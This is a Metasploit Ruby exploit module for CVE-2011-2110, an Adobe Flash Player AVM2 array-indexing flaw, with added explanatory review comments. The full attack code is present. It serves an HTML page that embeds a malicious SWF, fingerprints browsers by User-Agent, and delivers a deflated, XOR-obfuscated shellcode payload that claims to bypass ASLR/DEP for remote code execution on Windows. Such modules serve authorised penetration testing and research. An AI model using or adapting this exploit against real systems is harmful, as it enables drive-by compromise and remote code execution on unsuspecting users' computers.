Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2011-2110 (Adobe Flash Player AVM2 verification
# logic / array-indexing flaw, see 'References'). The module's HTTP server
# answers three kinds of request (see on_request_uri): an HTML page embedding a
# SWF, the prebuilt SWF trigger itself, and a text resource carrying the
# deflated, XOR-obfuscated payload. The SWF is shipped as a framework data file;
# its ActionScript source is referenced from #exploit.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Module metadata. Only one target ('Automatic') is defined; the payload is
  # limited to 2000 bytes with NUL as the sole bad character, and responses are
  # gzip-compressed and chunked by default.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23
        and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
        logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
        vulnerability that was used for attacks against Korean based organizations.

          Specifically, this issue occurs when indexing an array using an arbitrary value,
        memory can be referenced and later executed. Taking advantage of this issue does not rely
        on heap spraying as the vulnerability can also be used for information leakage.

          Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several
        other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and
        is very reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
          'Unknown' # malware version seen used in targeted attacks
        ],
      'References'     =>
        [
          ['CVE', '2011-2110'],
          ['OSVDB', '73007'],
          ['BID', '48268'],
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],
          ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],
          ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true,
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {}],
        ],
      'DisclosureDate' => '2012-06-21',
      'DefaultTarget'  => 0))
  end

  # Reads the prebuilt SWF trigger (CVE-2011-2110.swf under the framework data
  # directory) into @swf, then hands off to super (the HttpServer mixin).
  #
  # NOTE(review): fd is closed only on the success path; if read raises, the
  # handle leaks. A File.open block (or File.binread) would close it in all cases.
  def exploit
    # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
    # full aslr/dep bypass using the info leak as per malware
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-2110.swf" )
    fd = File.open( path, "rb" )
    @swf = fd.read(fd.stat.size)
    fd.close
    super
  end

  # Declares the zlib dependency (presumably loads it); Zlib::Deflate is used in
  # on_request_uri.
  def check_dependencies
    use_zlib
  end

  # Picks the target for a given User-Agent string.
  #
  # @param agent [String, nil] value of the request's User-Agent header
  # @return [Msf::Module::Target, nil] the explicitly chosen target when one was
  #   selected; otherwise targets[0] for MSIE or Firefox agents and nil for
  #   anything else. Since only 'Automatic' is defined, both recognised agents
  #   resolve to the same single entry.
  def get_target(agent)
    # Honour an explicitly selected target. Only 'Automatic' exists in 'Targets',
    # so as written this guard cannot fire.
    return target if target.name != 'Automatic'

    if agent =~ /MSIE/
      return targets[0] # ie 6/7/8 tested working
    elsif agent =~ /Firefox/
      return targets[0] # ff 10.2 tested working
    else
      return nil
    end
  end

  # HTTP request handler. Dispatches on the request URI:
  #   *.swf -> the SWF trigger loaded in #exploit
  #   *.txt -> the deflated, XOR-obfuscated payload
  #   else  -> an HTML page embedding the SWF, whose `info` query parameter
  #            carries the hex-encoded, XOR-obfuscated, deflated absolute URL of
  #            the *.txt resource
  # Requests from a User-Agent that get_target does not recognise are answered
  # with send_not_found and logged with the client address.
  #
  # @param cli client connection; peerhost/peerport are read for logging
  # @param request parsed HTTP request; headers['User-Agent'] and uri are read
  # @return [void] all branches end by sending a response
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    # Single-byte XOR key applied to both the payload and the URL below.
    # Presumably the SWF reverses it with the same constant — not visible here.
    xor_byte = 122
    trigger = @swf
    # Randomised resource names (3..8 alpha chars) for the SWF and payload files.
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
    code = rand_text_alpha(rand(6)+3) + ".txt"

    # Deflate the encoded payload, then XOR every byte with xor_byte.
    sc = Zlib::Deflate.deflate(payload.encoded)
    shellcode = ""

    sc.each_byte do | c |
      shellcode << (xor_byte ^ c)
    end

    # Absolute URL of the *.txt resource. When SRVHOST is the wildcard address,
    # the local address used to reach 50.50.50.50 stands in for the host.
    uri = ((datastore['SSL']) ? "https://" : "http://")
    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
    uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{code}"

    # Same deflate + XOR transform as the payload, then hex-encode for the query string.
    bd_uri = Zlib::Deflate.deflate(uri)

    uri = ""
    bd_uri.each_byte do | c |
      uri << (xor_byte ^ c)
    end

    bd_uri = uri.unpack("H*")[0]

    # Random id/name for the <object>/<embed> elements.
    obj_id = rand_text_alpha(rand(6)+3)

    # Note: both matches are unanchored, so ".swf"/".txt" anywhere in the URI qualifies.
    if request.uri.match(/\.swf/i)
      print_status("Sending malicious swf")
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    if request.uri.match(/\.txt/i)
      print_status("Sending payload")
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    html = <<-EOS
    <html>
    <head>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
    id="#{obj_id}" width="600" height="400"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{get_resource}/#{trigger_file}?info=#{bd_uri}" />
    <embed src="#{get_resource}/#{trigger_file}?info=#{bd_uri}" quality="high"
    width="320" height="300" name="#{obj_id}" align="middle"
    allowNetworking="all"
    type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </object>
    </center>
    </body>
    </html>
    EOS

    # Strip the four-space heredoc indentation from every line.
    html = html.gsub(/^ {4}/, '')

    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end